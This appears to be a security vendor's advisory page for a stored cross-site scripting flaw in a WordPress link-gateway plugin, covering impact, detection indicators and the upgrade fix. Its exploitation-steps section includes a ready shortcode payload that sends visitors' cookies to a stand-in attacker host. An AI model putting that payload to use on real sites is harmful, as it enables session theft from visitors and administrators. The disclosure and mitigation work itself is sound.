CVE-2026-3333
WordPress vulnerability analysis and mitigation

Overview

CVE-2026-3333 is a Stored Cross-Site Scripting (XSS) vulnerability in the MinhNhut Link Gateway plugin for WordPress, affecting all versions up to and including 3.6.1. The flaw exists in the plugin's linkgate shortcode due to insufficient input sanitization and output escaping on user-supplied attributes. It was published on March 21, 2026, with Wordfence as the reporting CNA. The vulnerability carries a CVSS v3.1 base score of 6.4 (Medium) (Wordfence, NVD).

Technical details

The root cause is CWE-79 (Improper Neutralization of Input During Web Page Generation), specifically insufficient sanitization of user-supplied shortcode attributes and missing output escaping in the plugin's template rendering. The vulnerable code paths are identifiable in classes.php (line 37) and templates/default/index.php (line 9), where user-controlled attributes passed to the [linkgate] shortcode are rendered without proper escaping (NVD, Wordfence). An authenticated attacker with at least Contributor-level access can embed a malicious shortcode containing arbitrary JavaScript into a WordPress page or post; the script executes in the browser of any user who subsequently visits that page. No user interaction beyond page visitation is required for the payload to trigger, as the scope is changed (cross-site impact).

Impact

Successful exploitation allows an authenticated Contributor-level attacker to persistently inject malicious JavaScript that executes in the context of any site visitor's browser session. This can lead to session cookie theft, credential harvesting, unauthorized actions performed on behalf of victims (including administrators), and potential site defacement or redirection to malicious content. Availability is not directly impacted, but confidentiality and integrity of user sessions and site content are at risk (NVD, Wordfence).

Exploitability

No public exploit code or active in-the-wild exploitation has been reported for CVE-2026-3333 as of the available data. The EPSS score is approximately 0.029% (0.000290), indicating a low probability of exploitation in the near term. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Exploitation requires an authenticated account with at least Contributor-level privileges on the target WordPress site, which limits the attacker pool but does not eliminate risk on sites with open registration or multiple contributors (Wordfence, NVD).

Exploitation steps

  1. Reconnaissance: Identify WordPress sites running the MinhNhut Link Gateway plugin version 3.6.1 or earlier, using tools like WPScan or by checking the plugin's readme.txt file exposed at /wp-content/plugins/minhnhut-link-gateway/readme.txt.
  2. Obtain Contributor Access: Register or log in as a user with at least Contributor-level privileges on the target WordPress site.
  3. Craft Malicious Shortcode: Create a new post or page and insert the [linkgate] shortcode with a malicious attribute payload, for example: [linkgate url="javascript:void(0)" text="<script>document.location='https://attacker.com/steal?c='+document.cookie</script>"].
  4. Publish or Submit Content: Submit the post for review or publish it (depending on role permissions). The malicious script is now stored in the WordPress database.
  5. Trigger Execution: When any site visitor (including administrators) navigates to the injected page, the browser renders the unescaped shortcode output and executes the injected JavaScript, potentially exfiltrating session cookies or performing actions on behalf of the victim (NVD, Wordfence).

Indicators of compromise

  • Logs: WordPress access logs showing POST requests to /wp-admin/post.php or the REST API from Contributor-level accounts containing [linkgate shortcode with unusual attribute values including <script>, javascript:, or encoded variants (%3Cscript%3E).
  • Database: WordPress wp_posts table entries containing [linkgate] shortcodes with embedded <script> tags or event handler attributes (e.g., onerror=, onload=) in post content.
  • Network: Outbound requests from victim browsers to unexpected external domains shortly after visiting pages containing the [linkgate] shortcode, potentially carrying cookie or session data in query parameters.
  • File System: No direct file system artifacts expected for this stored XSS, but review plugin files classes.php and templates/default/index.php for unauthorized modifications that may indicate further compromise.

Mitigation and workarounds

WordPress site administrators should update the MinhNhut Link Gateway plugin to version 3.6.2 or later, which contains the fix for insufficient input sanitization and output escaping (Wordfence). As an interim workaround, restrict Contributor-level user registration and audit existing Contributor accounts for untrusted users. Additionally, a Web Application Firewall (WAF) with XSS filtering rules — such as those provided by Wordfence — can help block exploitation attempts until the plugin is updated.

Community reactions

The vulnerability was reported and disclosed by Wordfence, which serves as the CNA for this CVE. No notable independent researcher commentary, media coverage, or significant social media discussion has been identified beyond standard vulnerability database listings and automated aggregators such as VulDB and INCIBE (NVD).

Additional resources


SourceThis report was generated using AI

Related WordPress vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-14805HIGH8.8
  • consulting
NoYesSep 15, 2026
CVE-2026-75983HIGH7.5
  • wp-event-solution
NoYesSep 15, 2026
CVE-2026-90650HIGH7.2
  • motopress-hotel-booking-lite
NoYesSep 15, 2026
CVE-2026-89141MEDIUM6.5
  • ai-engine
NoYesSep 15, 2026
CVE-2026-15609MEDIUM6.4
  • bridge
NoYesSep 15, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management